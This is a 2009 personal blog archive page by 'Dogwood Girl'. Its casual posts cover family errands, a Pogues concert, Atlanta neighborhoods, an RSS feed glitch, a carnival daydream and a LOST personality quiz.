Excuses, Excuses . . .

Monday, March 9th, 2009

Well, I started an awesome, fun post about childhood stuff, but then it was seventies and sunny, so I took my bike out for a ride. Then halfway down the hill closest to my house, I threw my chain off and the whole damn thing jammed, so I walked bike back home, and went for a run. That was nice, but then I had to go pick up some free stuff from EAV, then had to get lunch, and pick up Rollie, volunteer for the literary club at his school, take him to the park afterwards (bribery for being good during the lit club), then off to the grocery, where he argued every freakin’ purchase with me.

Just got home. So not going to write my post until tomorrow.

Mostly because
we’re going to see The Pogues!
Along with just about every person I knew in high school and college.

I am sure i will feel awesome tomorrow.

Oh, Pierce if you are reading this, baby update, please!

Time Change

Monday, March 9th, 2009

The time change has not only screwed up the Dogwood household, but also the Dogwood Girl website. No idea what is going on with my system clock, but my last posts were not published at 4 and 5 a.m.

Carnie Love Affair

Sunday, March 8th, 2009

Dogwood Girl is not here. She renewed a love affair born early, a love of Tilt-A-Whirl stomach lurches, and Van Halen Himalaya rides. She and LouLou La Loush ditched their husbands and children and ran away with the carnival. They are carnies, now. They ride the Himalaya every night. They ride like the wind.

Where I’m From. Where I’ve Been. Where I’m At.

I’m a little drunk. Ish.

So, i have been thinking about my neighborhood a lot today. A friend from my old neighborhood is grappling with the whole educating-a-kid-in-intown-Atlanta-schools issue. She asked my opinion on a living in my old neighborhood (EAV) vs. living in my new neighborhood (Northlake Mall/Lavista/Briarlake) vs. living in the real OTP burbs (I grew up in Roswell/Alpharetta. She is considering E. Cobb.)

I thought scads about all the different things that go into choosing what is not just best for a kid’s education, but what is best for a family. And all of that discussion confirmed for me that we made the best decision for us.

Also? It helps when my awesome neighbors call me at 3pm on Friday to bring the kids over to play in the sunshine, swing, slide, throw pine cones, and climb fig trees, while we drink beer and wine and order Mediterranean takeout.

I miss my old neighborhood. I love my new neighborhood. I wish they could meet each other, because, damn, they would get along really well together.

Testing, Testing. 1, 2, 3.

Mic check.

First of all, a little background: See that little Subscribe text up there to the right? That’s how you subscribe to my website, so that my posts automatically show up in your mailbox or aggregator, depending on what you use. Click on that, and you don’t have to go into your bookmarks to check my blog, and you don’t have to type in the URL. You can read all your favorite blogs and websites (those publishing feeds, anyway) in one nifty place. I use Google Reader. (Mom, i will just call you later.)

With that out of the way, my problem: It would be ultra awesome if you read my blog if you let me know how you access it. If you read it through a feed aggregator (like Google Reader, via RSS) please let me know if you have had any problems with it.

I have a place where Dogwood Girl’s RSS feed shows up as invalid, even though I have validated it. It works fine in Google Reader. Works fine in my mail. Works fine for Todd through Mail. Did not work in Simplaris Blogcast, which I use to post my blog to my Facebook page. (I work around that using the Feedburner feed.)

Would be great to hear if anyone is able to easily add the feed to their aggregator, and if not, let me know where you are trying to add the feed. Seems some people find my feed valid and others don’t.

Comments would be awesome and much appreciated.

I am baffled. And on cold medicine. And grumpy. Probably need more cold medicine.

Nephew Overload at Dogwood Girl

Tuesday, February 10th, 2009

I know that I just posted a picture of Dash last week, but that was a situation where he had to share the spotlight with Emily the Terrible, and really, as his mother so aptly put it, “Dash is a complete publicity whore.”

Not another picture of Dogwood's Nephew!

Letter From a Reader

Tuesday, February 3rd, 2009

One very observant reader and friend of Dogwood Girl came across a very funny oops on Dogwood Girl, which I thought I would share with you all. Such highbrow readers will certainly find this humorous.

You would think that with content like that, I would be getting way more hits. Thanks for the huge laugh, Jasonaut.

Sun?

Sunday, January 25th, 2009
You Are Sun

You have a past history of being secretive and deceptive.

You’re the type of person who will protect yourself at all costs.

While you can be crafty when you need to, you are usually giving, friendly, and likable.

You truly care for other people, and you are very sensitive.

People tend to underestimate you. You seem like a fragile flower, but you’re not.

You are gutsy and clever. You have a way of getting what you want without anyone noticing.

Who Are You on LOST?
Via Mostly Muppet, who posted a great summary of the recent Lost episodes. And no, i don’t think I’m a Sun, but maybe I am. . .

New Look

Saturday, January 24th, 2009

Okay, I messed around with themes and gave Dogwood Girl some new Duds. I am pretty sure I messed up my RSS feed in the process. So, if you are having trouble with any part of Dogwood Girl, let me know. If you lost the feed, please resubscribe. (Mom, that means you need to click that little link over there that says, “Subscribe.”)

It’s Alive!

Thursday, January 22nd, 2009

Seems that the kinks are worked out and i have a working blog again. Please let me know if you see anything funky, though.

Boy, i have a lot of catching up to do. But probably not today. Today is for me. 37.
